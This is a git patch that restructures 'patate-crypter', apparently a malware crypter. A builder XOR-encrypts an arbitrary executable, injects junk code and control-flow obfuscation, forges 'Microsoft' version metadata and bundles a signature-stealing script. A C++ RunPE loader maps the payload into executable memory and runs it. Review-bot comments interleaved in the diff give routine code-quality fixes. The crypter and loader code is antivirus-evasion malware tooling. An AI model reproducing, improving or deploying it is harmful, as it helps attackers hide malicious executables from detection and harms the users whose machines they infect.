From 6dfe690749f82fc5ec8b3e7e1f9cf2ac23ed5c25 Mon Sep 17 00:00:00 2001
From: ALittlePatate
Date: Mon, 18 Mar 2024 19:30:52 +0100
Subject: [PATCH] fix: file structure, made a bit of refactor
---
.gitignore | 7 +--
gui.py => Builder/gui.py | 16 +++----
gui.ui => Builder/gui.ui | 0
metadata.py => Builder/metadata.py | 4 +-
obfuscation.py => Builder/obfuscation.py | 4 +-
randomness.py => Builder/randomness.py | 8 +---
Builder/requirements.txt | 2 +
sigthief.py => Builder/sigthief.py | 0
Crypter/config.h | 2 +
main.cpp => Crypter/main.cpp | 46 +------------------
DllExecutor.rc => Crypter/patate-crypter.rc | 10 ++--
.../patate-crypter.vcxproj | 14 ++++--
.../patate-crypter.vcxproj.filters | 8 ++--
.../patate-crypter.vcxproj.user | 4 +-
resource.h => Crypter/resource.h | 0
README.md | 1 +
config.h | 2 -
DllExecutor.sln => patate-crypter.sln | 2 +-
requirements.txt | 3 --
19 files changed, 48 insertions(+), 85 deletions(-)
rename gui.py => Builder/gui.py (94%)
rename gui.ui => Builder/gui.ui (100%)
rename metadata.py => Builder/metadata.py (95%)
rename obfuscation.py => Builder/obfuscation.py (98%)
rename randomness.py => Builder/randomness.py (65%)
create mode 100644 Builder/requirements.txt
rename sigthief.py => Builder/sigthief.py (100%)
create mode 100644 Crypter/config.h
rename main.cpp => Crypter/main.cpp (77%)
rename DllExecutor.rc => Crypter/patate-crypter.rc (88%)
rename DllExecutor.vcxproj => Crypter/patate-crypter.vcxproj (94%)
rename DllExecutor.vcxproj.filters => Crypter/patate-crypter.vcxproj.filters (96%)
rename DllExecutor.vcxproj.user => Crypter/patate-crypter.vcxproj.user (65%)
rename resource.h => Crypter/resource.h (100%)
delete mode 100644 config.h
rename DllExecutor.sln => patate-crypter.sln (89%)
delete mode 100644 requirements.txt
diff --git a/.gitignore b/.gitignore
index 3f1fed5..2ef43c1 100644
--- a/.gitignore
+++ b/.gitignore
@@ -2,7 +2,8 @@
*.dll
.vs
__pycache__
-Debug
-Release
+bin
+build
sample.h
-icon.ico
\ No newline at end of file
+icon.ico
+settings.txt
\ No newline at end of file
diff --git a/gui.py b/Builder/gui.py
similarity index 94%
rename from gui.py
rename to Builder/gui.py
index 83a2ae6..14bd21b 100644
--- a/gui.py
+++ b/Builder/gui.py
@@ -142,7 +142,7 @@ class Ui_mainWindow(object):
def generate(self) :
in_filename = self.filepath
- out_filename = self.pushButton.text().split(".")[0] + "_out.exe"
+ out_filename = "../bin/" + self.pushButton.text().split(".")[0] + "_out.exe"
xor_key = ''
if self.xor :
@@ -160,7 +160,7 @@ class Ui_mainWindow(object):
print(f"Filename : {in_filename}")
file = bytearray(open(in_filename, 'rb').read())
- with open("sample.h", 'w') as output:
+ with open("../Crypter/sample.h", 'w') as output:
output.write("unsigned char sample[] = { ")
for count, byte in enumerate(file, 1):
if xor_key :
@@ -176,10 +176,10 @@ class Ui_mainWindow(object):
QCoreApplication.processEvents() # Working with a copy of main.cpp
- os.rename("main.cpp", "DO_NOT_TOUCH.cpp")
- shutil.copyfile('DO_NOT_TOUCH.cpp', 'main.cpp')
+ os.rename("../Crypter/main.cpp", "../Crypter/DO_NOT_TOUCH.cpp")
+ shutil.copyfile('../Crypter/DO_NOT_TOUCH.cpp', '../Crypter/main.cpp')
- with open("config.h", "w") as c :
+ with open("../Crypter/config.h", "w") as c :
c.write(f'#pragma once\n#define KEY "{xor_key}"')
self.label_2.setText("Adding junk code...")
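Review bot: `Crypter/config.h` is added to the repository in this commit with an empty `KEY`, yet `generate()` in `Builder/gui.py` overwrites it on every run, so the tracked file shows up as modified after each build and the generated value is one careless `git add` away from being committed, which is exactly what happened to the old root `config.h` that this commit deletes. Since `sample.h`, the other file `generate()` writes, is already ignored here, add `+Crypter/config.h` to this hunk and remove the file from the index, keeping at most a template the builder copies from.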
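Review bot: The `os.rename` on the first `+` line of the `@@ -176` hunk moves the real `../Crypter/main.cpp` aside and nothing restores it if an exception is raised before the clean-up in the `@@ -201` hunk (the `shutil.copyfile` right after it, the `open` of `config.h`, or the obfuscation pass), so a failed run leaves `DO_NOT_TOUCH.cpp` as the only copy and the next run renames the already-rewritten file over it; put the `os.remove`/`os.rename` clean-up in a `finally:` that starts right after the rename. The hard-coded `../Crypter/` and `../bin/` prefixes repeated in all four hunks of this file, in `FILES_TO_OBFUSCATE` and the `outfile` comparison in `obfuscation.py`, and in `metadata.py` assume the process was started from `Builder/` (the README's `cd Builder`); one module-level constant such as `CRYPTER_DIR = os.path.join(os.path.dirname(os.path.abspath(__file__)), "..", "Crypter")` would remove both the cwd dependency and the duplicated literals. `file = bytearray(open(in_filename, 'rb').read())` in the `@@ -160` hunk also leaves the handle to the garbage collector, unlike the `with open(...)` the same hunk uses for `sample.h`. `generate()` begins in the `@@ -142` hunk and runs past the end of this hunk.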
@@ -201,15 +201,15 @@ class Ui_mainWindow(object): vs_path = os.popen("\"%ProgramFiles(x86)%/Microsoft Visual Studio/Installer/vswhere.exe\" -nologo -latest -property installationPath").read().replace("\n","") #https://stackoverflow.com/questions/46223916/msbuild-exe-not-found-cmd-exe cmd_line = vs_path + "\\Msbuild\\Current\\Bin\\MSBuild.exe" - return_code = os.system("\""+cmd_line+"\" . /p:Configuration=Release;Platform=x86;OutDir=.;DebugSymbols=false;DebugType=None;Zm=5000;TargetExt=.exe;TargetName="+out_filename.replace(".exe", "")+" /t:Rebuild") + return_code = os.system("\""+cmd_line+"\" ../Crypter /p:Configuration=Release;Platform=x86;OutDir=.;DebugSymbols=false;DebugType=None;Zm=5000;TargetExt=.exe;TargetName="+out_filename.replace(".exe", "")+" /t:Rebuild") if return_code : self.label_2.setText("build failed.") QCoreApplication.processEvents() # Cleaning up.. - os.remove("main.cpp") - os.rename("DO_NOT_TOUCH.cpp", "main.cpp") + os.remove("../Crypter/main.cpp") + os.rename("../Crypter/DO_NOT_TOUCH.cpp", "../Crypter/main.cpp") # Find all BMP files in the directory with a wildcard pattern bmp_files = glob.glob(os.path.join(".", "*.bmp")) diff --git a/gui.ui b/Builder/gui.ui similarity index 100% rename from gui.ui rename to Builder/gui.ui diff --git a/metadata.py b/Builder/metadata.py similarity index 95% rename from metadata.py rename to Builder/metadata.py index 8c51f7d..b837b88 100644 --- a/metadata.py +++ b/Builder/metadata.py @@ -26,11 +26,11 @@ def generate_bmp(filename): def change_metadata(icon_file) : number_of_bmp = 0#GetRandomRange(2, 6) makes the entropy go to 7.4 for ONE image, so very very very bad - f = open("DllExecutor.rc", "r") + f = open("../Crypter/patate-crypter.rc", "r") f_c = f.readlines() f.close() - o = open("DllExecutor.rc", "w") + o = open("../Crypter/patate-crypter.rc", "w") for line in f_c : if "CompanyName" in line : line = f'\t\t\tVALUE "CompanyName", "Microsoft"\n' 
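Review bot: The `+` line still assembles the MSBuild command by string concatenation and hands it to `os.system`, so `out_filename`, which comes from the user-picked file name via `self.pushButton.text()`, lands unquoted inside the `TargetName=` property; a name containing spaces, `;`, `&` or `"` either corrupts the property list or is interpreted by the shell, and the only signal is the `build failed.` label. Build an argument list instead (adding `import subprocess` if the file does not have it), `return_code = subprocess.run([cmd_line, "../Crypter", "/p:Configuration=Release;Platform=x86;OutDir=.;DebugSymbols=false;DebugType=None;Zm=5000;TargetExt=.exe;TargetName=" + out_filename.replace(".exe", ""), "/t:Rebuild"]).returncode`, which also removes the hand-placed quotes around `cmd_line`. `generate()` continues past the end of this hunk.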
diff --git a/obfuscation.py b/Builder/obfuscation.py similarity index 98% rename from obfuscation.py rename to Builder/obfuscation.py index 4a7bf4d..a7e5acf 100644 --- a/obfuscation.py +++ b/Builder/obfuscation.py @@ -148,7 +148,7 @@ def GetRandomControlFlow(): return cpp_code -FILES_TO_OBFUSCATE = {"main.cpp":"DO_NOT_TOUCH.cpp"}# "getapi.cpp":"DO_NOT_TOUCH_API.cpp"} +FILES_TO_OBFUSCATE = {"../Crypter/main.cpp":"../Crypter/DO_NOT_TOUCH.cpp"}# "getapi.cpp":"DO_NOT_TOUCH_API.cpp"} def obfuscate(PASS, CFLOW_PASS, cflow, junk) : if PASS < CFLOW_PASS : PASS = CFLOW_PASS @@ -301,7 +301,7 @@ def obfuscate(PASS, CFLOW_PASS, cflow, junk) : #include \r\n #include \r\n""" - if outfile == "main.cpp" : + if outfile == "../Crypter/main.cpp" : out.insert(0, fake_api) out.insert(0, static_imports) out.insert(0, fake_libs) diff --git a/randomness.py b/Builder/randomness.py similarity index 65% rename from randomness.py rename to Builder/randomness.py index 634ecb2..b25b112 100644 --- a/randomness.py +++ b/Builder/randomness.py @@ -11,24 +11,20 @@ def GetRandomNumber() : def GetRandomRange(a, b): if a > b: - a, b = b, a # Swap a and b if a is greater than b + a, b = b, a - range_size = b - a + 1 # Calculate the size of the range + range_size = b - a + 1 - # Calculate the number of bits required to represent all values in the range num_bits = 0 while 2 ** num_bits < range_size: num_bits += 1 - # Generate a random number in binary representation using GetRandomBool() random_binary = [GetRandomBool() for _ in range(num_bits)] - # Convert the binary representation to an integer within the specified range random_integer = 0 for i, bit in enumerate(random_binary): random_integer += bit * (2 ** i) - # Map the generated integer to the desired range [a, b] mapped_value = a + random_integer if mapped_value > b : return GetRandomRange(a, b) diff --git a/Builder/requirements.txt b/Builder/requirements.txt new file mode 100644 index 0000000..df7496a --- /dev/null +++ b/Builder/requirements.txt 
@@ -0,0 +1,2 @@
+pillow
+pywin32
\ No newline at end of file
diff --git a/sigthief.py b/Builder/sigthief.py
similarity index 100%
rename from sigthief.py
rename to Builder/sigthief.py
diff --git a/Crypter/config.h b/Crypter/config.h
new file mode 100644
index 0000000..9dde3f6
--- /dev/null
+++ b/Crypter/config.h
@@ -0,0 +1,2 @@
+#pragma once
+#define KEY ""
\ No newline at end of file
diff --git a/main.cpp b/Crypter/main.cpp
similarity index 77%
rename from main.cpp
rename to Crypter/main.cpp
index fd3637c..076aaea 100644
--- a/main.cpp
+++ b/Crypter/main.cpp
@@ -55,41 +55,30 @@ void decrypt(const char* key, int offset = 0, int limit = -1) { HMODULE RunPE(const void* dll_buffer, size_t dll_size, DWORD newBase) { //START - // Check if the DLL buffer is at least as large as the size of the DOS header. if (dll_size < sizeof(IMAGE_DOS_HEADER)) { return NULL; } decrypt(KEY, 0, 1024); // decrypt only the header - // Get a pointer to the DOS header. const IMAGE_DOS_HEADER* dos_header = static_cast(dll_buffer); - // Check if the DLL buffer is at least as large as the size of the NT headers. if (dll_size < dos_header->e_lfanew + sizeof(IMAGE_NT_HEADERS)) { return NULL; } - // Get a pointer to the NT headers. const IMAGE_NT_HEADERS* nt_headers = reinterpret_cast(static_cast(dll_buffer) + dos_header->e_lfanew); - - // Check if the DLL is a valid 32-bit or 64-bit PE file. if (nt_headers->Signature != IMAGE_NT_SIGNATURE) { return NULL; } - // Calculate the size of the image. const size_t image_size = nt_headers->OptionalHeader.SizeOfImage; - - // Allocate memory for the DLL in the current process. void* image_base = VirtualAlloc((LPVOID)newBase, image_size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); if (image_base == NULL) { return NULL; } - // Get a pointer to the section headers. const IMAGE_SECTION_HEADER* section_headers = reinterpret_cast(nt_headers + 1); - // Copy the section data to the allocated memory. for (WORD i = 0; i < nt_headers->FileHeader.NumberOfSections; ++i) { const IMAGE_SECTION_HEADER* section_header = section_headers + i; @@ -100,7 +89,6 @@ HMODULE RunPE(const void* dll_buffer, size_t dll_size, DWORD newBase) DEBUG_PRINTF("[+] Wrote section data\n"); - //Rebasing symbols DEBUG_PRINTF("[+] Rebasing Dll\n"); HMODULE dll_handle = static_cast(image_base); 
@@ -110,46 +98,34 @@ HMODULE RunPE(const void* dll_buffer, size_t dll_size, DWORD newBase) // Get the address of the DLL's import directory. const IMAGE_IMPORT_DESCRIPTOR* import_directory = reinterpret_cast(static_cast(image_base) + nt_headers->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress); - DEBUG_PRINTF("[+] Fixing imports\n"); - // Iterate through the import directory and resolve the imported functions. + while (import_directory->Name != 0) { - // Get the name of the imported DLL. const char* import_dll_name = static_cast(image_base) + import_directory->Name; - // Load the imported DLL. HMODULE import_dll = LoadLibraryA(import_dll_name); if (import_dll == NULL) { VirtualFree(image_base, 0, MEM_RELEASE); return NULL; } - // Get the address of the imported functions. IMAGE_THUNK_DATA* import_thunk_data = reinterpret_cast(static_cast(image_base) + import_directory->FirstThunk); - // Resolve the imported functions. while (import_thunk_data->u1.AddressOfData != 0) { - // Check if the import is by ordinal if (IMAGE_SNAP_BY_ORDINAL(import_thunk_data->u1.Ordinal)) { - // Get the ordinal value DWORD ordinal = IMAGE_ORDINAL(import_thunk_data->u1.Ordinal); - // Get the address of the imported function by ordinal void* import_address = GetProcAddress(import_dll, reinterpret_cast(ordinal)); - // Write the address of the imported function to the IAT. if (import_address != nullptr) { *reinterpret_cast(import_thunk_data) = import_address; } } else { - // Get the import by name const IMAGE_IMPORT_BY_NAME* import_by_name = reinterpret_cast(static_cast(image_base) + import_thunk_data->u1.AddressOfData); - // Get the address of the imported function by name void* import_address = GetProcAddress(import_dll, reinterpret_cast(import_by_name->Name)); - // Write the address of the imported function to the IAT. if (import_address != nullptr) { *reinterpret_cast(import_thunk_data) = import_address; } 
@@ -163,58 +139,40 @@ HMODULE RunPE(const void* dll_buffer, size_t dll_size, DWORD newBase) DEBUG_PRINTF("[+] Doing relocation\n"); - // Get the address of the DLL's base relocation directory. const IMAGE_BASE_RELOCATION* base_relocation = reinterpret_cast(static_cast(image_base) + nt_headers->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress); - - // Calculate the delta between the original base address and the new base address. DWORD delta = newBase - nt_headers->OptionalHeader.ImageBase; - // Iterate through the base relocation directory and apply the relocations. while (base_relocation->VirtualAddress != 0) { - // Get the relocation block header. const WORD* relocation_block = reinterpret_cast(base_relocation + 1); - // Calculate the number of relocations in the current block. DWORD num_relocations = (base_relocation->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) / sizeof(WORD); - // Apply each relocation in the current block. for (DWORD i = 0; i < num_relocations; ++i) { - // Get the current relocation entry. WORD relocation_entry = relocation_block[i]; - // Extract the type and offset from the relocation entry. WORD type = relocation_entry >> 12; WORD offset = relocation_entry & 0xFFF; - // Get a pointer to the address to be relocated. DWORD* reloc_address = reinterpret_cast(static_cast(image_base) + base_relocation->VirtualAddress + offset); - // Apply the relocation based on the type. switch (type) { case IMAGE_REL_BASED_ABSOLUTE: - // The relocation is skipped if the type is absolute. break; case IMAGE_REL_BASED_HIGHLOW: - // Adjust the address by adding the delta. *reloc_address += delta; break; default: - // Handle other relocation types if necessary. - // ... break; } } - // Move to the next relocation block. base_relocation = reinterpret_cast(reinterpret_cast(base_relocation) + base_relocation->SizeOfBlock); } DEBUG_PRINTF("\n[+] Calling DllMain\n"); - // Call the DLL's entry point, if it has one. 
if (entry_point != NULL) { - // Get the address of the DLL's entry point in the IAT. void* entry_point_iat = static_cast(image_base) + nt_headers->OptionalHeader.AddressOfEntryPoint; // Cleaning @@ -255,7 +213,6 @@ int __stdcall WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCm DEBUG_PRINTF("[+] Started\n"); - // Load the DLL from a buffer in memory const int bufferSize = sizeof(sample) / sizeof(sample[0]); HMODULE dll = RunPE(sample, bufferSize, NEW_ADDRESS); @@ -264,7 +221,6 @@ int __stdcall WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCm return 1; } - // Free the DLL ::FreeLibrary(dll); return 0; diff --git a/DllExecutor.rc b/Crypter/patate-crypter.rc similarity index 88% rename from DllExecutor.rc rename to Crypter/patate-crypter.rc index d139624..f589799 100644 --- a/DllExecutor.rc +++ b/Crypter/patate-crypter.rc @@ -68,12 +68,12 @@ BEGIN BLOCK "040c04b0" BEGIN VALUE "CompanyName", "Microsoft" - VALUE "FileDescription", "sblujwzduxlhnhmiyiri" + VALUE "FileDescription", "qhffltbhaqzfykugipsz" VALUE "FileVersion", "1.0.0.1" - VALUE "InternalName", "tkedqel.exe" + VALUE "InternalName", "gqhfyim.exe" VALUE "LegalCopyright", "Copyright (C) 2023" - VALUE "OriginalFilename", "lgeagvp.exe" - VALUE "ProductName", "aejcvay.exe" + VALUE "OriginalFilename", "ddyshnw.exe" + VALUE "ProductName", "swtvick.exe" VALUE "ProductVersion", "1.0.0.1" END END @@ -83,7 +83,7 @@ BEGIN END END -MAINICON ICON "C:/Users/patate/Desktop/Programmation/C++/Low-Level/RunPE/icon.ico" +MAINICON ICON "C:/Users/patate/Desktop/Programmation/C++/Maldev/patate-crypter/icon.ico" #endif ///////////////////////////////////////////////////////////////////////////// diff --git a/DllExecutor.vcxproj b/Crypter/patate-crypter.vcxproj similarity index 94% rename from DllExecutor.vcxproj rename to Crypter/patate-crypter.vcxproj index 7790671..06116f1 100644 --- a/DllExecutor.vcxproj +++ b/Crypter/patate-crypter.vcxproj 
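Review bot: The new `MAINICON ICON` line keeps an absolute path under `C:/Users/patate/Desktop/...`, so the resource script only compiles on that one machine even though the commit moved the project into `Crypter/`. Judging by the old and new absolute paths, `icon.ico` sits at the repository root (where `.gitignore` lists it), so a path relative to the .rc's directory, `MAINICON ICON "../icon.ico"`, should resolve for every checkout. If `change_metadata` in `Builder/metadata.py` rewrites this line per build, the committed value should still be the portable one.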
@@ -22,7 +22,7 @@ 16.0 Win32Proj {f2b3a240-e4b5-428f-991a-765881b2e877} - DllExecutor + patate-crypter 10.0 @@ -72,15 +72,23 @@ true + $(ProjectDir)..\bin\ + $(ProjectDir)build\ false + $(ProjectDir)..\bin\ + $(ProjectDir)build\ true + $(ProjectDir)..\bin\ + $(ProjectDir)build\ false + $(ProjectDir)..\bin\ + $(ProjectDir)build\ @@ -109,7 +117,7 @@ Disabled false EnableFastChecks - MultiThreadedDLL + MultiThreaded Windows @@ -162,7 +170,7 @@ - + diff --git a/DllExecutor.vcxproj.filters b/Crypter/patate-crypter.vcxproj.filters similarity index 96% rename from DllExecutor.vcxproj.filters rename to Crypter/patate-crypter.vcxproj.filters index 7ec23b8..db9ee56 100644 --- a/DllExecutor.vcxproj.filters +++ b/Crypter/patate-crypter.vcxproj.filters @@ -20,18 +20,18 @@ - - Fichiers d%27en-tête - Fichiers d%27en-tête Fichiers d%27en-tête + + Fichiers d%27en-tête + - + Fichiers de ressources diff --git a/DllExecutor.vcxproj.user b/Crypter/patate-crypter.vcxproj.user similarity index 65% rename from DllExecutor.vcxproj.user rename to Crypter/patate-crypter.vcxproj.user index 88a5509..966b4ff 100644 --- a/DllExecutor.vcxproj.user +++ b/Crypter/patate-crypter.vcxproj.user @@ -1,4 +1,6 @@  - + + true + \ No newline at end of file diff --git a/resource.h b/Crypter/resource.h similarity index 100% rename from resource.h rename to Crypter/resource.h diff --git a/README.md b/README.md index e0f1de0..dcceedb 100644 --- a/README.md +++ b/README.md @@ -34,5 +34,6 @@ With obfuscation (only showing a few nodes, the original graph was more than 40K # How to run ``` +cd Builder python gui.py ``` diff --git a/config.h b/config.h deleted file mode 100644 index 2583735..0000000 --- a/config.h +++ /dev/null @@ -1,2 +0,0 @@ -#pragma once -#define KEY "ugifthdrdgrd" \ No newline at end of file diff --git a/DllExecutor.sln b/patate-crypter.sln similarity index 89% rename from DllExecutor.sln rename to patate-crypter.sln index 3091ded..b2eaf02 100644 --- a/DllExecutor.sln +++ b/patate-crypter.sln 
@@ -3,7 +3,7 @@ Microsoft Visual Studio Solution File, Format Version 12.00 # Visual Studio Version 17 VisualStudioVersion = 17.1.32407.343 MinimumVisualStudioVersion = 10.0.40219.1 -Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "DllExecutor", "DllExecutor.vcxproj", "{F2B3A240-E4B5-428F-991A-765881B2E877}" +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "patate-crypter", "Crypter/patate-crypter.vcxproj", "{F2B3A240-E4B5-428F-991A-765881B2E877}" EndProject Global GlobalSection(SolutionConfigurationPlatforms) = preSolution diff --git a/requirements.txt b/requirements.txt deleted file mode 100644 index 3585821..0000000 --- a/requirements.txt +++ /dev/null @@ -1,3 +0,0 @@ -OpenSSL -pillow -pywin32==302 \ No newline at end of file